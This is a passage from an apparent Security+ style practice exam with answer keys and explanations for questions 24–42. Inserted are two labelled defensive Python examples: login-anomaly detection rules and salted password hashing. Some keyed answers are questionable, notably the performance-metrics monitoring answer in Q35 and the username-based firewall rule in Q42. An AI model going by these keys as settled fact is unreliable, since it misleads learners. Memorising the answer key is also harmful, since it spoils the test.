Sharing data with foreign allies may have diplomatic benefits, but it does not directly align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. In fact, sharing data with foreign entities may raise concerns about data privacy and security.

Storing the data forever to achieve a historical feat

Explanation

Storing data forever does not align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Keeping data indefinitely increases the risk of data breaches and unauthorized access, leading to privacy concerns and potential security vulnerabilities.

Overall explanation

5.4 Summarize elements of effective security compliance.

Encrypting the data at rest and in transit best aligns with national privacy requirements aimed at improving data security and safeguarding the citizens’ personal information. It is a widely accepted practice that does not compromise the privacy of the data it’s protecting.

Domain

5.0 Security Program Management and Oversight

Question 24Skipped

What aspect of business continuity policies should be prioritized by a large software development firm that wants to ensure that unforeseen disruptions will not affect its project repositories and development environments housed in its data center infrastructure?

Secure code training

Explanation

Secure code training is essential for improving the security of software applications, but it is not directly related to ensuring business continuity in the event of disruptions affecting project repositories and development environments in the data center infrastructure.

Physical access to the project room

Explanation

Physical access to the project room is important for security purposes, but it does not address the overall business continuity needs of the software development firm, particularly in relation to protecting project repositories and development environments in the data center infrastructure during unforeseen disruptions.

Contact numbers of project developers

Explanation

Contact numbers of project developers are important for communication during disruptions, but they do not directly address the protection and recovery of project repositories and development environments in the data center infrastructure.

Correct answer

Data backup and recovery procedures

Explanation

Data backup and recovery procedures are crucial for ensuring that project repositories and development environments can be restored in case of unforeseen disruptions. Prioritizing this aspect of business continuity policies will help the software development firm maintain continuity and protect its critical assets.

Overall explanation

5.1 Summarize elements of effective security governance.

The software development firm should prioritize data backup and recovery procedures to ensure that unforeseen disruptions will not affect its project repositories and development environments housed in its data center infrastructure. Backing up the data ensures that there is a redundant storage of the important information. Successful recovery procedures guarantee that the data that has been backed up can be restored and used at some point later in time.

Domain

5.0 Security Program Management and Oversight

Question 25Skipped

An organization wants to have the ability to perform security assessments and audits on a third-party vendor with whom they are negotiating a contract for the support of critical IT services. What would give the organization the ability to do so?

Due diligence form

Explanation

A due diligence form is a document used to gather information about a potential business partner or vendor. While it is essential for conducting background checks and verifying information, it does not grant the organization the explicit right to perform security assessments and audits on the vendor.

Service level agreement

Explanation

A service level agreement (SLA) is a contract that defines the level of service a vendor will provide to the organization. While an SLA may include security-related provisions, it does not specifically grant the organization the right to perform security assessments and audits on the vendor.

Non-disclosure agreement

Explanation

A non-disclosure agreement is a legal contract that protects confidential information shared between parties. While it is important for protecting sensitive information, it does not give the organization the ability to perform security assessments and audits on a third-party vendor.

Correct answer

Right-to-audit clause

Explanation

A right-to-audit clause is a contractual provision that gives the organization the explicit right to conduct security assessments and audits on a third-party vendor. This clause ensures that the organization can verify the vendor’s compliance with security standards and practices before entering into a contract for critical IT services.

Overall explanation

5.3 Explain the processes associated with third-party risk assessment and management.

The right-to-audit clause is a contractual clause that gives organizations the capability to perform security assessments and audits on the systems and practices of the vendor. The clause ensures that organizations have the right to verify that the security controls of the vendor are within compliance with the standards that have been agreed upon.

Domain

5.0 Security Program Management and Oversight

Question 26Skipped

The security team at a company noticed a user account login to the network at 1700 hours from Dar es Salaam, and within 10 minutes the same account logged in from Washington. What pattern does this login behavior most likely indicate?

The user traveled quickly from Dar es Salaam to Washington

Explanation

This choice does not provide a valid explanation for the login behavior described in the question. The rapid change in login locations from Dar es Salaam to Washington within 10 minutes is unlikely to be due to the user physically traveling between the two locations.

Correct answer

The account may be compromised

Explanation

This choice provides a valid explanation for the login behavior described in the question. The rapid change in login locations within a short time frame, especially from geographically distant locations, is a common indicator of a compromised account where unauthorized access is being attempted.

The security team were not proactive for 10 minutes

Explanation

This choice does not provide a valid explanation for the login behavior described in the question. Being proactive or not proactive does not relate to the pattern of login behavior observed by the security team.

The user is browsing in incognito mode

Explanation

This choice does not provide a valid explanation for the login behavior described in the question. Browsing in incognito mode does not explain the rapid change in login locations within a short time frame.

Overall explanation

2.4 Given a scenario, analyze indicators of malicious activity.

The login behavior pattern indicates that the account may be compromised. This scenario is an example of “impossible travel”: the user logs in from two geographically distant locations within a time frame in which no existing means of transportation could have carried the user from one location to the other. This indicates that someone other than the legitimate user has gained access to the account.

Domain

2.0 Threats, Vulnerabilities, and Mitigations
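The two detection patterns described in Questions 15 and 26 (failed logins spread across several accounts and source IPs, and “impossible travel”) as SIEM-style correlation rules over a constructed authentication log. This is an added example, not part of the practice test; the key=value log format, the IP-to-city table and the alert thresholds are assumptions constructed for it.

```python
"""
Added example (not part of the practice test): two SIEM-style correlation
rules over a constructed authentication log.
Rule 1 (Question 15): many failed logins across several accounts and IPs in one window.
Rule 2 (Question 26): "impossible travel" between two successful logins of one account.
Both rules only raise alerts; blocking IPs or disabling accounts is left to
the firewall or IAM system, as the page's explanations note.
"""
import math
import re
from datetime import datetime, timedelta, timezone

# Constructed log lines in an assumed key=value format (not a real product's format).
SAMPLE_LOG = """\
2024-05-01T16:58:00Z user=alice src=203.0.113.10 result=FAIL
2024-05-01T16:58:05Z user=bob src=203.0.113.11 result=FAIL
2024-05-01T16:58:09Z user=carol src=198.51.100.7 result=FAIL
2024-05-01T16:58:15Z user=dave src=198.51.100.8 result=FAIL
2024-05-01T16:58:20Z user=erin src=203.0.113.12 result=FAIL
2024-05-01T17:00:00Z user=alice src=203.0.113.10 result=SUCCESS
2024-05-01T17:05:00Z user=bob src=203.0.113.11 result=SUCCESS
2024-05-01T17:10:00Z user=alice src=198.51.100.20 result=SUCCESS
2024-05-01T17:40:00Z user=bob src=203.0.113.11 result=SUCCESS
"""

# Constructed IP-to-location table standing in for a GeoIP lookup
# (RFC 5737 documentation addresses; coordinates are approximate city centres).
GEO = {
    "203.0.113.10": ("Dar es Salaam", -6.79, 39.28),
    "203.0.113.11": ("Dar es Salaam", -6.79, 39.28),
    "198.51.100.20": ("Washington", 38.91, -77.04),
}

LINE_RE = re.compile(r"^(\S+) user=(\S+) src=(\S+) result=(FAIL|SUCCESS)$")


def parse_log(text):
    """Return (timestamp, user, src_ip, result) tuples sorted by time; unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return sorted(events)


def detect_failed_login_spray(events, window=timedelta(minutes=5),
                              min_fails=5, min_users=3, min_ips=2):
    """Rule 1: alert when the failures in one sliding window span many accounts and many IPs.
    Thresholds are illustrative; a production rule is tuned to the environment's baseline."""
    fails = [e for e in events if e[3] == "FAIL"]
    for i, (start, _, _, _) in enumerate(fails):
        in_window = [e for e in fails[i:] if e[0] - start <= window]
        users = {e[1] for e in in_window}
        ips = {e[2] for e in in_window}
        if len(in_window) >= min_fails and len(users) >= min_users and len(ips) >= min_ips:
            # One alert per burst is enough here; a SIEM would also suppress duplicates.
            return [{"rule": "failed_login_spray", "start": start.isoformat(),
                     "failures": len(in_window), "users": sorted(users), "ips": sorted(ips)}]
    return []


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two latitude/longitude points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def detect_impossible_travel(events, geo=GEO, max_speed_kmh=1000.0):
    """Rule 2: alert when consecutive successful logins of one account imply an impossible speed."""
    alerts = []
    last_seen = {}  # user -> (timestamp, source ip) of the previous successful login
    for ts, user, ip, result in events:
        if result != "SUCCESS" or ip not in geo:
            continue
        if user in last_seen:
            prev_ts, prev_ip = last_seen[user]
            city1, lat1, lon1 = geo[prev_ip]
            city2, lat2, lon2 = geo[ip]
            hours = (ts - prev_ts).total_seconds() / 3600.0
            dist = haversine_km(lat1, lon1, lat2, lon2)
            # "dist > speed * hours" also flags a non-zero distance with zero elapsed time.
            if dist > max_speed_kmh * hours:
                alerts.append({"rule": "impossible_travel", "user": user, "from": city1,
                               "to": city2, "km": round(dist), "minutes": round(hours * 60)})
        last_seen[user] = (ts, ip)
    return alerts


def run_rules(text=SAMPLE_LOG):
    """Parse the log once and run both correlation rules over it."""
    events = parse_log(text)
    return detect_failed_login_spray(events) + detect_impossible_travel(events)
```

Calling `run_rules()` on the constructed log yields one spray alert (five failures, five accounts, five source IPs) and one impossible-travel alert for `alice` (Dar es Salaam to Washington, roughly 12,700 km in 10 minutes); `bob`, who logs in twice from the same city, raises nothing.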

Question 27Skipped

Which is the most relevant log for a security analyst trying to identify and analyze events that have occurred on a Windows server as part of an investigation of a security incident?

Database log

Explanation

The Database log contains information specific to database operations and transactions. While it may be important for investigating incidents related to database security, it is not the most relevant log for a security analyst trying to identify and analyze events that have occurred on a Windows server as part of a broader security incident investigation.

Application log

Explanation

The Application log records events related to applications running on the Windows server, such as errors, warnings, and information messages. While it may contain some relevant information for an investigation, it is not as directly related to security events as the Security log.

System log

Explanation

The System log primarily contains information about the operating system, hardware, and drivers. While it may contain some relevant information for a security incident investigation, it is not the most relevant log for identifying and analyzing security events on a Windows server.

Correct answer

Security log

Explanation

The Security log is the most relevant log for a security analyst investigating security incidents on a Windows server. It contains records of security-related events such as logon attempts, resource access, and other security policy enforcement activities. This log is crucial for identifying and analyzing security incidents.

Overall explanation

4.9 Given a scenario, use data sources to support an investigation.

The Security log is most relevant for identifying and analyzing events that have occurred on a Windows server. The log is rich in security-related events such as login attempts, user privilege changes, file modifications, and audit successes or failures. It provides invaluable data that can help in investigating security incidents.

Domain

4.0 Security Operations

Question 28Skipped

A security researcher wants to report a vulnerability she has discovered in a widely used software application to the vendor in an ethical and responsible way. What is the best approach that may be taken?

Share the vulnerability to the public to help all users

Explanation

Sharing the vulnerability with the public without informing the vendor first can lead to widespread exploitation by malicious actors before a patch or fix is available. This can result in significant harm to users and damage to the reputation of the security researcher.

Sell details of the vulnerability in the dark web

Explanation

Selling details of the vulnerability in the dark web is illegal and unethical. It can lead to the exploitation of the vulnerability by cybercriminals for malicious purposes, putting users at risk and potentially causing significant harm.

Exploit the vulnerability to show the weakness

Explanation

Exploiting the vulnerability to demonstrate the weakness is not considered ethical or responsible. It can lead to potential harm to users of the software and may violate laws and regulations related to unauthorized access and hacking.

Correct answer

Inform the vendor through a responsible disclosure program

Explanation

Informing the vendor through a responsible disclosure program is the best approach to report a vulnerability in an ethical and responsible way. This allows the vendor to address the issue and release a patch or fix before the vulnerability is exploited by malicious actors.

Overall explanation

4.3 Explain various activities associated with vulnerability management.

The security researcher should inform the vendor through a responsible disclosure program. This gives the vendor or manufacturer ample time to address the issue and release a tested patch or fix for the vulnerability before it is publicly advertised and known.

Domain

4.0 Security Operations

Question 29Skipped

A threat post has recently revealed sophisticated cyberattacks targeting personal and financial data from highly skilled attackers with advanced techniques. What type of threat actors are they?

Unskilled attacker

Explanation

An unskilled attacker typically lacks the knowledge and expertise to carry out sophisticated cyberattacks targeting personal and financial data. They are more likely to rely on basic and easily detectable methods, making them less likely to be behind the advanced techniques mentioned in the threat post.

Correct answer

Organized crime

Explanation

Organized crime groups are known for their advanced capabilities and resources, making them capable of carrying out sophisticated cyberattacks targeting personal and financial data. They often have the motivation and financial incentive to engage in such activities.

Insider threat

Explanation

An insider threat refers to a current or former employee, contractor, or business partner who has access to an organization’s systems and data. While insider threats can pose a significant risk to personal and financial data, they may not necessarily have the advanced techniques and resources mentioned in the threat post.

Nation-state

Explanation

Nation-state actors are government-sponsored entities with advanced capabilities and resources. They have the expertise to conduct highly sophisticated cyberattacks targeting personal and financial data, often for political, economic, or strategic purposes.

Overall explanation

2.1 Compare and contrast common threat actors and motivations.

The threat actors are organized crime. The attack shows sophistication and advanced techniques combined with a drive to steal data. When such skill is used for unethical purposes, it is most often an indication of cybercriminal groups. Cybercriminals are mainly motivated by monetary gain and can perform well-coordinated and highly organized cyberattacks.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 30Skipped

Which factor should a network administrator consider to achieve optimal wireless network performance as he performs a site survey of a busy urban area known for heavy radio frequency interference from businesses and residences?

Average number of pedestrians

Explanation

The average number of pedestrians in the area may impact the overall network usage and congestion, but it is not a direct factor that affects the performance of the wireless network in terms of radio frequency interference and signal quality.

Correct answer

Proximity of the Wi-Fi networks

Explanation

The proximity of Wi-Fi networks is crucial in achieving optimal wireless network performance, especially in a busy urban area with heavy radio frequency interference. Closer networks can cause interference and signal degradation, impacting the overall performance of the wireless network.

Size of the buildings in the area

Explanation

The size of the buildings in the area can affect the propagation of wireless signals and coverage, but it is not the primary factor that a network administrator should consider to achieve optimal wireless network performance in a busy urban area with heavy radio frequency interference.

Availability of public Wi-Fi hotspots

Explanation

The availability of public Wi-Fi hotspots may contribute to the overall radio frequency interference in the area, but it is not a direct factor that a network administrator should focus on to achieve optimal wireless network performance during a site survey.

Overall explanation

4.1 Given a scenario, apply common security techniques to computing resources.

The network administrator should consider the proximity of the Wi-Fi networks to obtain optimal wireless network performance. Overlapping channels and the heavy radio frequency interference from businesses and residences can impact the performance of the Wi-Fi network; it is therefore essential to evaluate the surrounding networks.

Domain

4.0 Security Operations

Question 31Skipped

A cloud service provider uses password hashes to store their clients’ credentials in the database and not plain text. Which of the below statements on hashing is correct?

Correct answer

Hashing makes a fixed-length and hard-to-reverse string of characters from a password

Explanation

This statement is correct. Hashing takes a password and converts it into a fixed-length string of characters, making it difficult to reverse engineer the original password. This process is used to securely store passwords in databases without exposing the actual password values.

Hashing allows passwords to be encrypted and decrypted symmetrically

Explanation

Hashing and encryption are two different processes. Hashing is not designed for encryption and decryption of passwords. Encryption is reversible, while hashing is irreversible and used for password storage and verification.

Hashing is reversible to allow passwords to be recovered when lost

Explanation

Hashing is a one-way function, meaning it is not reversible. Once a password is hashed, it cannot be converted back to its original plain text form. This is done for security purposes to protect user credentials in case of a data breach.

Hashing compresses and reduces the size of the password for quick login speed

Explanation

Hashing does not compress or reduce the size of passwords. Its primary purpose is to create a unique and fixed-length representation of the password for secure storage and comparison during authentication processes.

Overall explanation

3.3 Compare and contrast concepts and strategies to protect data.

Hashing makes a fixed-length and hard-to-reverse string of characters from a password. It is a one-way process, designed to make it computationally very difficult to retrieve the original data that produced the hash. Security is enhanced because even if the hash is compromised, recovering the password remains computationally difficult.

Domain

3.0 Security Architecture
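The explanation above describes hashing as a one-way, fixed-length transformation used for storage and comparison. The following added example (not part of the practice test or its author's material) shows what that looks like in practice: a salted, iterated PBKDF2-SHA256 hash whose digest is always 64 hex characters regardless of password length, stored together with its salt and work factor so that it can later be verified without ever recovering the password. The record format `pbkdf2_sha256$<iterations>$<salt>$<digest>` and the function names are assumptions made for this example.

```python
"""Added example: salted, iterated password hashing and verification.

Illustrates the properties described in the question: the output has a fixed
length, it cannot be reversed to obtain the password, and verification works
by recomputing the hash and comparing, never by decrypting.
"""
import hashlib
import hmac
import os
from typing import Optional

ALGORITHM = "pbkdf2_sha256"   # assumed record label, not a standard identifier
ITERATIONS = 600_000          # work factor; raise it over time as hardware gets faster
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a storable record 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.

    The digest is always 32 bytes (64 hex characters), whatever the password
    length, and PBKDF2 is one-way: the record lets us check a password later,
    not recover it. The salt parameter exists only so tests are reproducible;
    production code should always let a fresh random salt be generated.
    """
    if salt is None:
        # A unique random salt per password means two users with the same
        # password get different hashes and precomputed tables are useless.
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and work factor and compare."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so response timing does not leak how many
    # leading bytes of the digest matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def digest_hex_length(stored: str) -> int:
    """Length of the digest field; fixed at 64 hex characters for SHA-256."""
    return len(stored.split("$")[3])


if __name__ == "__main__":
    # Constructed sample credentials for demonstration only.
    short_record = hash_password("correct horse")
    long_record = hash_password("a" * 200)
    print(short_record)
    print("digest length (short pw):", digest_hex_length(short_record))
    print("digest length (200-char pw):", digest_hex_length(long_record))
    print("correct password verifies:", verify_password("correct horse", short_record))
    print("wrong password verifies:", verify_password("correct horse!", short_record))
```

Note that the stored record contains nothing that lets the provider (or an attacker who dumps the table) turn the digest back into the password; a "forgot password" flow therefore issues a reset, never a recovery, which is exactly the point of the "reversible to allow passwords to be recovered" option being wrong.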

Question 32Skipped

A team of security professionals simulated a cybersecurity incident response scenario in a tabletop exercise that involved a significant data breach that exposed valuable information. What is the fundamental reason for this exercise?

Determination of the financial impact of data breaches

Explanation

Determining the financial impact of data breaches is an important aspect of incident response, but it is not the fundamental reason for conducting a tabletop exercise. The primary goal of such exercises is to evaluate and improve the incident response process rather than focusing solely on financial implications.

Development of techniques to forecast incidents

Explanation

Developing techniques to forecast incidents is an important aspect of cybersecurity preparedness, but it is not the primary goal of a tabletop exercise focused on incident response. The main purpose of such exercises is to assess and enhance the organization’s ability to respond effectively to cybersecurity incidents, rather than predicting future incidents.

Identification of individuals responsible for the breach

Explanation

Identifying individuals responsible for the breach is a critical step in incident response, but it is not the primary objective of a tabletop exercise. The main purpose of these exercises is to assess and enhance the incident response process as a whole, rather than pinpointing blame on specific individuals.

Correct answer

Evaluation and improvement of the incident response process

Explanation

Evaluating and improving the incident response process is the fundamental reason for conducting a tabletop exercise in response to a cybersecurity incident. These exercises help organizations test their response procedures, identify weaknesses, and make necessary improvements to enhance their overall incident response capabilities.

Overall explanation

4.8 Explain appropriate incident response activities.

The fundamental reason for the tabletop exercise is the evaluation and improvement of the incident response process. The exercise assesses and enhances the organization's preparedness for responding to incidents. Teams can practice and simulate their response to security incidents and identify areas where there is room for improvement without an actual incident having to occur.

Domain

4.0 Security Operations

Question 33Skipped

Robert has bought a new smartphone. As he sets up his new device, he notices several applications that have already been installed on his phone which he may never use. Moreover, some of these apps request various permissions to be granted to them. What are these apps that Robert is seeing?

Malware

Explanation

Malware is a broad term that encompasses various types of malicious software designed to harm or exploit a user’s device. While malware can be pre-installed on devices, it is not specifically related to the situation described in the question where Robert is seeing pre-installed applications that may require permissions.

Correct answer

Bloatware

Explanation

Bloatware refers to software that is pre-installed on a device by the manufacturer or carrier, often taking up unnecessary space and resources. These apps may not be useful to the user and can sometimes require various permissions to function properly.

Ransomware

Explanation

Ransomware is a type of malware that encrypts a user’s files and demands a ransom in exchange for decrypting them. It is not typically pre-installed on devices like bloatware and does not require user permissions to operate.

Adware

Explanation

Adware is software that displays advertisements on a user’s device, often in a disruptive or intrusive manner. While adware can be pre-installed on devices, it is primarily focused on generating revenue through advertising and may not necessarily require additional permissions.

Overall explanation

2.4 Given a scenario, analyze indicators of malicious activity.

The apps that Robert is seeing are called bloatware. They are applications that are pre-installed on the device by the manufacturer but may not necessarily be needed or wanted by the user once the device is acquired. Bloatware is generally not malicious software; however, it may occupy a portion of the device's storage, affect performance, and at times request excessive permissions.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 34Skipped

An IT administrator wants to enforce hardened security policies for all Windows-based computers within the corporate network. Which of the options is the best way to achieve this?

Switch on Windows Firewall

Explanation

Switching on Windows Firewall is a good security practice, but it only focuses on network security and does not cover all aspects of hardened security policies for Windows-based computers. Group policy settings provide a more comprehensive approach to enforcing security policies.

Switch on Windows Defender

Explanation

Switching on Windows Defender is important for antivirus and anti-malware protection, but it is not sufficient to enforce all hardened security policies across Windows-based computers. Group policy settings cover a wider range of security configurations and controls beyond just antivirus protection.

Correct answer

Group policy settings

Explanation

Group policy settings allow the IT administrator to centrally manage and enforce security policies across all Windows-based computers within the corporate network. This includes settings related to password complexity, account lockout policies, software restrictions, and more, making it the best way to achieve hardened security.

Physically lock the computers

Explanation

Physically locking the computers does not address the need for enforcing hardened security policies. While physical security measures are important, they do not provide the level of control and customization that group policy settings offer for implementing security policies.

Overall explanation

4.5 Given a scenario, modify enterprise capabilities to enhance security.

The best way to enforce hardened security policies for all Windows-based computers within the corporate network is group policy settings. They allow administrators to define and enforce security policies and configurations on the Windows machines that are joined to the domain. The settings that can be configured range from access controls and password policies to firewall rules.

Domain

4.0 Security Operations

Question 35Skipped

The technology division at a logistics agency wants to ensure that it can promptly detect and mitigate unauthorized access to its critical resources, due to rising concerns about the security of its internal systems and data. Which monitoring practice would best suit their needs?

Employee attendance monitoring

Explanation

Employee attendance monitoring is used to track employee work hours, schedules, and attendance patterns. While important for workforce management and compliance purposes, it does not directly address the need to detect and mitigate unauthorized access to critical resources within the organization’s internal systems and data.

Correct answer

System performance metrics monitoring

Explanation

System performance metrics monitoring involves tracking and analyzing various performance indicators of the organization’s systems, such as CPU usage, memory utilization, network traffic, and application response times. By monitoring system performance metrics, the technology division can promptly detect anomalies, potential security breaches, or unauthorized access attempts to critical resources, making it the best monitoring practice to suit their security needs.

Data backups monitoring

Explanation

Data backups monitoring is essential for ensuring the availability and integrity of data in case of data loss or corruption. While important for data protection, it does not directly address the concerns of detecting and mitigating unauthorized access to critical resources within the organization’s internal systems and data.

Social media sites monitoring

Explanation

Social media sites monitoring is focused on tracking and analyzing social media platforms for mentions, trends, and customer interactions. While social media monitoring can be valuable for reputation management and customer engagement, it is not directly related to detecting and mitigating unauthorized access to critical resources within the organization’s internal systems and data.

Overall explanation

4.4 Explain security alerting and monitoring concepts and tools.

The logistics agency should employ system performance metrics monitoring to promptly detect and mitigate unauthorized access to its critical resources. The monitoring practice involves the analysis of system log files, network traffic, and other potential sources that may give indications of malicious activities targeting the organization.

Domain

4.0 Security Operations

Question 36Skipped

A manufacturing facility has recently suffered a security incident where an unauthorized individual managed to gain access to the industrial control systems (ICS) network that is used for the automation of the production line process. What is the major risk of such a situation?

Theft of confidential documents

Explanation

Theft of confidential documents is a potential risk in a security incident, but in the context of an unauthorized individual gaining access to industrial control systems (ICS) network, the major risk is more related to the disruption of critical processes rather than the theft of documents.

Spying on the production line

Explanation

While spying on the production line can be a concern in terms of industrial espionage, the major risk in this situation is the unauthorized disruption of critical processes that can impact the production line’s operations and potentially cause significant damage.

Correct answer

Unauthorized disruption of critical processes

Explanation

The major risk of an unauthorized individual gaining access to the industrial control systems (ICS) network is the potential for unauthorized disruption of critical processes. This disruption can lead to downtime, loss of production, and even physical damage to the manufacturing facility’s equipment.

Scanning of the network

Explanation

Scanning of the network by an unauthorized individual can lead to the discovery of vulnerabilities and potential entry points for further attacks. While network scanning is a security concern, the major risk in this scenario is the unauthorized disruption of critical processes within the industrial control systems (ICS) network.

Overall explanation

3.1 Compare and contrast security implications of different architecture models.

The major risk of a successful compromise of the industrial control systems (ICS) network is the unauthorized disruption of critical processes. If the critical processes are disrupted or compromised, severe consequences may result with regard to the operation and safety of the system.

Domain

3.0 Security Architecture

Question 37Skipped

What is the primary purpose of a jump server used by the network administrators?

Backup server during network outages

Explanation

A jump server is not primarily used as a backup server during network outages. Its main purpose is to provide secure administrative access to critical servers.

Correct answer

Administrative access to critical servers without directly exposing them

Explanation

The primary purpose of a jump server is to provide network administrators with administrative access to critical servers without directly exposing those servers to potential security threats. By using a jump server, administrators can securely manage and monitor the servers without compromising their security.

Redirect traffic to load balancers

Explanation

A jump server is not primarily used to redirect traffic to load balancers. Its main purpose is to act as an intermediary server that network administrators can use to access critical servers securely and manage them without direct exposure.

Central traffic monitoring location

Explanation

A jump server is not primarily used as a central traffic monitoring location. Its main purpose is to provide a secure gateway for network administrators to access critical servers without directly exposing them to potential security risks.

Overall explanation

3.2 Given a scenario, apply security principles to secure enterprise infrastructure.

A jump server is used to give administrative access to critical servers without directly exposing them. The network administrators may isolate the critical servers from the rest of the network and allow communication to them only through the jump server, which is itself kept secured from unauthorized access. Access to sensitive resources is thereby controlled and monitored, enhancing security.

Domain

3.0 Security Architecture

Question 38Skipped

A high-security data center has employed an access control vestibule where visitors need to first enter an enclosed area before being able to access the data center. What role does the vestibule have in terms of physical security?

It provides a waiting place for visitors

Explanation

The vestibule is not primarily designed to provide a waiting place for visitors. Its main purpose is to enhance physical security measures within the data center facility.

Correct answer

The risk of unauthorized access is minimized

Explanation

The access control vestibule plays a crucial role in physical security by minimizing the risk of unauthorized access to the data center. It acts as an additional layer of security that prevents unauthorized individuals from gaining entry into the secure area.

It increases the number of people who may go in at a time

Explanation

Increasing the number of people who may go in at a time is not the main function of the access control vestibule. The primary goal is to control and restrict access to the data center, not to accommodate more visitors simultaneously.

It plays the role of a fire escape chamber

Explanation

The vestibule does not serve as a fire escape chamber. Its main purpose is to control access to the data center and enhance physical security measures, rather than providing an escape route in case of a fire.

Overall explanation

1.2 Summarize fundamental security concepts.

The risk of unauthorized access is minimized by the access control vestibule. Visitors to the data center need to make their way across a set of two secure doors before gaining access to the data center. Social engineering attacks such as tailgating or piggybacking are prevented.

Domain

1.0 General Security Concepts

Question 39Skipped

What is the primary security concern for a corporate firm that has implemented a choose your own device (CYOD) policy that allows employees to select the mobile devices that suit them from a range of various brands and models available?

Ensuring employees are satisfied

Explanation

Ensuring employees are satisfied is important for employee morale and productivity, but it is not the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. Security of the devices and data should take precedence over employee satisfaction in this context.

Correct answer

Managing the diversity and security of the devices

Explanation

Managing the diversity and security of the devices is the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. With employees using various brands and models of mobile devices, ensuring consistent security measures, policies, and controls across all devices becomes crucial to protect against potential security threats and data breaches.

Listing the owners and models of all devices

Explanation

Listing the owners and models of all devices may be a good practice for inventory and asset management purposes, but it is not the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. The main security concern is managing the diversity and security of the devices to protect sensitive corporate data.

Getting discounts from the manufacturers

Explanation

Getting discounts from the manufacturers is not a primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. While cost savings may be a factor in device selection, the main focus should be on security implications of diverse devices being used within the organization.

Overall explanation

4.1 Given a scenario, apply common security techniques to computing resources.

The primary security concern for the corporate firm that has implemented the Choose Your Own Device (CYOD) policy is managing the diversity and security of the devices. Employees are allowed to select the mobile device of their preference from a wide range of brands and models, each of which has its own configuration standards and settings that must be managed to ensure the security and integrity of corporate data and systems.

Domain

4.0 Security Operations

Question 40Skipped

A security guard at a corporate office building is one day confronted with an individual trying to gain access to the premises without an access card. The individual claims to be a new hire who has accidentally left the card inside the building. What is the best course of action the security guard should take?

Correct answer

Ask the individual to wait politely and contact a supervisor for instructions

Explanation

Asking the individual to wait politely and contacting a supervisor for instructions is the best course of action to ensure proper security protocols are followed. The supervisor can verify the individual’s identity and access rights before allowing entry into the building.

Write down the situation on a paper and discuss it with the team tomorrow

Explanation

Writing down the situation on a paper and discussing it with the team tomorrow does not address the immediate security concern of the individual trying to gain access without an access card. It is essential to handle such situations promptly and in accordance with security policies.

Allow the individual access into the building because it is only fair

Explanation

Allowing the individual access into the building without proper verification of identity and access rights can compromise the security of the premises. It is important to follow established procedures and protocols to prevent unauthorized access.

Take a picture of the individual with a smartphone and share it on the Telegram group

Explanation

Taking a picture of the individual with a smartphone and sharing it on a Telegram group is not a recommended security practice for verifying identity and access rights. It is important to follow established procedures and involve the appropriate personnel, such as a supervisor, to handle security incidents effectively.

Overall explanation

1.2 Summarize fundamental security concepts.

The security guard should politely ask the individual to wait and contact a supervisor for instructions. The guard should follow protocol and not immediately allow the individual onto the premises without their access card. Waiting for verification from a supervisor preserves security, as it is essential to verify the identity and intentions of the individual before granting exceptional access.

Domain

1.0 General Security Concepts

Question 41Skipped

A group of cybersecurity professionals is assessing the risk associated with a cyberattack that has previously hit the company. They have projected that the attack may occur twice a year. What is the ARO?

0.2

Explanation

A value of 0.2 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once every five years, which does not align with the projection made by the cybersecurity professionals in this scenario.

0.5

Explanation

A value of 0.5 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once every two years, not twice a year as projected by the cybersecurity professionals in this scenario.

Correct answer

2

Explanation

A value of 2 for the Annualized Rate of Occurrence (ARO) aligns with the projection made by the cybersecurity professionals that the cyberattack may occur twice a year. This makes it the correct choice in this context.

1

Explanation

A value of 1 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once a year, not twice as projected by the cybersecurity professionals in this scenario.

Overall explanation

5.2 Explain elements of the risk management process.

The annualized rate of occurrence (ARO) is 2. The ARO is a measure of the expected number of times in which a specific risk event may occur within a year. Since the cybersecurity professionals have projected that the attack may occur twice a year it implies that the ARO is 2.

Domain

5.0 Security Program Management and Oversight

Question 42Skipped

The network team at an organization aims to restrict access to sensitive internal resources. What type of firewall rule should they implement to best ensure that only authorized employees may access the human resources database?

Correct answer

An inbound rule that only allows traffic from authorized usernames to the human resources database

Explanation

The correct rule is an inbound one that focuses on filtering by usernames, as this approach targets individual users and verifies their identities before granting access to the sensitive HR database. This method ensures that only employees with proper credentials can access the data, providing a more granular level of control than merely relying on IP addresses. By validating access based on usernames, the firewall directly aligns with the organization’s need to restrict access to only authorized employees, maintaining a higher level of security around sensitive information.

An outbound rule that allows traffic from the human resources database to the internal network

Explanation

An outbound rule controlling traffic from the HR database is focused on what the database can send to the internal network, which does not restrict who can access the database in the first place. This rule would not address the requirement of limiting access to the HR database to specific employees, as it only manages traffic leaving the database, not incoming requests from users trying to access it.

